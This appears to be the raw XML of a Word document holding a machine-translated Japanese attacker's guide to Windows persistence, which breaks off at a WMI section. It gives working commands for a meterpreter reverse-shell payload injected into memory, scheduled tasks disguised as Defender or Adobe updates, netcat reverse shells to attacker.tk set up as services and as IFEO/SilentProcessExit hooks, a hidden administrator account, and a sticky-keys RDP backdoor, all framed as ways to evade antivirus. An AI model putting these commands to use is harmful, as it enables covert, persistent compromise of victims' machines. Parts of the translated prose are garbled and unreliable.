    <w:p w14:paraId="1DA94B3F" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>検証:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B86F35" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>regクエリ "HKEY_CURRENT_USER \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run" / s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788EE405" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="1CCE949F" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">レジストリのキーをこのディレクトリに書き込むこともできます </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ただし、このディレクトリにキーを作成するには、PRIVILEGED RIGHTS* が必要です。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C286B75" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="75AF3D38" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>---インメモリ---!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECC85C1" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RAMにハングするバックドアを注入することは、痕跡を残さずにターゲットマシンに足場を築きたい場合に理にかなっています。 アンチウイルスは通常、多くの追加のリソース消費を伴うため、メモリアクティビティをほとんど制御できません</w:t>
      </w:r>
      <w:r>
        <w:t>。 経験豊富なユーザーでさえ、法的手続きの中に隠されていることに気付く可能性は低いです。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6734130E" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>インメモリバックドアとして、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>を使用します。 これはおそらく、ディスクに触れることなくメモリ内で排他的に実行できる最もよく知られたRATです。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CBE709" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="506B3423" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -p windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> LHOST=1.2.3.4 LPORT=8888 -f raw -o meter32.bin </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exitfunc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">=thread </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>StagerRetryCount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=999999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBC03D3" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>$&gt; inject_windows.exe PIDメーター32.bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EB78B7" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="0282CDC4" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最大限のステルス性を実現するには</w:t>
      </w:r>
      <w:r>
        <w:t>、再起動後の永続性の損失を伴います。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1C7E0A" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 悪意のあるスレッドはライブラリの外部で開始されるため、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Procexp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> はそのようなスレッドを null アドレスから開始しているかのように表示することがよくあります。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331C3B6C" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="5D207D77" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>オフィス</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427A3943" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">この </w:t>
      </w:r>
      <w:r>
        <w:t>方法は、攻撃されたユーザーがオフィススイートで頻繁に作業する場合に適しています。 それほど珍しいことではありません!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F3A2EB" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>reg add "HKCU\Software\Microsoft\Office test\Special\Perf" /t REG_SZ /d C:\users\username\meter.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBDFA92" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="69428DC6" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">    長所:再起動後も存続し、すべてのユーザーが使用できます。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3945E3DC" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">    デメリット:起動間隔が管理できない。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49433D39" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="3390866E" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>(特権権限のみ*)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A81F1D1" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="7626C02E" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>---タスク スケジューラによるピン留め---!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A79C12" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>タスクスケジューラのピン留めは、既製のxmlをインポートすることによって行われます。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041B4605" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>1)既製のPythonスクリプトを実行し、xmlを生成します。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2559DB60" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">この </w:t>
      </w:r>
      <w:r>
        <w:t>スクリプトでは、いくつかのパラメーターを入力する必要があります。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0341B624" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">始める </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>programm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>は、このタスクを実行するものです、PowerShell.exe |アーティファクト.exe |ランdll32.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF52267" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">stager PowerShell またはその他のパラメーター - </w:t>
      </w:r>
      <w:r>
        <w:t>起動時にプログラムに渡されるパラメーター (PowerShell.exe の場合) は、PowerShell ステージャー、アーティファクト.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> [オプション] です。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79357A0C" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">日付登録タスク - </w:t>
      </w:r>
      <w:r>
        <w:t>タスクの登録日は、偽装したい他のタスクについて確認できます。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13980AC6" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">日付、終了タスク - </w:t>
      </w:r>
      <w:r>
        <w:t>タスク終了日</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE21230" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">一日の時間繰り返しタスク - </w:t>
      </w:r>
      <w:r>
        <w:t>タスクが繰り返される時間、「PT3M」 - 3分ごと。"PT1P" - 毎時。プログラムが実行中の場合、タスクは新しいプログラムセッションを開始しません。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE0A77C" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>name_xml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>はxmlの名前で、Adobe Update、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WindowsDefender</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>などの名前を使用します。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E86170B" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>その後</w:t>
      </w:r>
      <w:r>
        <w:t>、必要なxmlが生成されます。 次に、足場を固めたいクライアントのPCにダウンロードします。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492EB00D" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">その後 </w:t>
      </w:r>
      <w:r>
        <w:t>、xmlをアップロードしたディレクトリに移動し、beaconにコマンドを入力します。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F24BF43" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">シェルschtasks /Create /RUシステム/XML Security_Update.xml /TN WinDefenderの </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCA2D54" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>その後</w:t>
      </w:r>
      <w:r>
        <w:t>、xmlを削除すると、もう必要ありません。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A39CDFF" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>RM Security_Update.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A0B1B6" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="1DCE798C" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="1519AEF4" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>！---サービス---！</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155977DF" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Service Managerは必要に応じてサービスを再起動するため、ピン留めにはサービス</w:t>
      </w:r>
      <w:r>
        <w:t>を使用します。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24586674" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="6E5F2BB5" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>シェルscは永続性を作成します binPath = "nc.exe -e \ windows \ system32 \ cmd.exe attacker.tk 8888" start = auto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541CA81A" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>シェル SC 障害持続性リセット = 0 アクション = 再起動/60000/再起動/60000/再起動/60000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A69D645" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">シェル SC 開始の永続性 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794DF353" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="3E7CA453" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">    長所:再起動後も存続し、起動間隔を管理しやすく、どのユーザーでも問題ありません。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB8D0A7" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">    デメリット:管理者権限が必要です。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232981F8" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="0A6BBEC5" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>---コンフィグ---!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62823D78" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>OS構成を変更して永続性を整理することは、ウイルス対策から身を隠すための優れた方法です。 これは、実行可能コードをまったく使用しない唯一のケースです。 ただし、これはターゲットマシンに直接アクセスできる場合にのみ適用されます。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397CFD62" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>リモートアクセスを取得できる非表示のユーザーを作成することは、おそらくこのような攻撃の最もよく知られた亜種です。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B117BCF" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="38C77A8F" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>net user attacker p@ssw0rd /add (ネットユーザーの攻撃者  /追加)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B588EE" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>net localgroup administrators /add attacker (ネット ローカル グループ管理者 /攻撃者を追加)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A52E927" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v attacker /t REG_DWORD /d 0 /f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C75D14" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="404A8EEC" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve"> RDPを介したWindowsでのブックマークのシンプルで効率的な実装:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0759D897" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reg_sz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /d "\windows\system32\cmd.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD6DF11" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>reg add "HKLM\system\currentcontrolset\control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0x0 /f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A384A37" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="5C842547" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">    長所:ウイルス対策で検出するのが難しく、再起動します。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5496F407" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">    短所: 管理者/root権限が必要であり、マシンがNATまたはファイアウォールの背後にある場合は適していません。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1C8536" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="672F4C32" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>---デバッガ---！</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8B035E" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>攻撃者は、攻撃されたユーザーが電卓などのプログラムを頻繁に実行していることを知っている場合、ジョイナーを使用してそのプログラムの本体にコードを挿入できます。 ただし、実行可能ファイルへの干渉は、アンチウイルス側の実行可能ファイルに対する</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不信</w:t>
      </w:r>
      <w:r>
        <w:t>感のレベルを容赦なく高めます。  もっとエレガントな実行は、起動をインターセプトすることです。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0CE187" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>計算をコピーします.exe _calc.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3534AA3F" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\calc.exe" /v Debugger /t reg_sz /d "cmd /C _calc.exe &amp; c:\windows\nc.exe -e c:\windows\system32\cmd.exe attacker.tk 8888" /f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40740130" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="3D5E6129" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>被害者が電卓を起動して閉じるとすぐに、攻撃者は逆シェルを想定します。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C229C0" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="7BC88C01" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">    さらに、再起動中です。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AFF9B9" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">    デメリット:管理者権限が必要です。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150C15B0" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA8AE7F" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>---Gフラグ---!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613B0265" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>これとほぼ同じ方法で、ユーザーが特定のプログラムを閉じたときにコードが実行されるように調整できます。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD7C8BD" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options \ notepad.exe" /v GlobalFlag /t REG_DWORD /d 512</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043CD1A8" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C43C916" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "nc -e \windows\system32\cmd.exe attacker.tk 8888"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F862D87" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="198D7A66" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">    さらに、再起動中です。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639D532D" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve">    デメリット:管理者権限が必要です。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258CC110" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5"/>
    <w:p w14:paraId="23D742E1" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>Autoruns ではこのメソッドは検出されませんが、レジストリ ブランチを確認できます。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142D70D5" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SilentProcessExit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2E4E4C9C" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDDBD1D" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:t>---WMI---!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31ACBD1B" w14:textId="77777777" w:rsidR="00522AD5" w:rsidRDefault="00522AD5" w:rsidP="00522AD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>自動起動を実行するかなり信頼性の高い方法は、WMI イベントを使用することです。 定期的にバックドアを起動できます。</w:t>
      </w:r>
    </w:p>
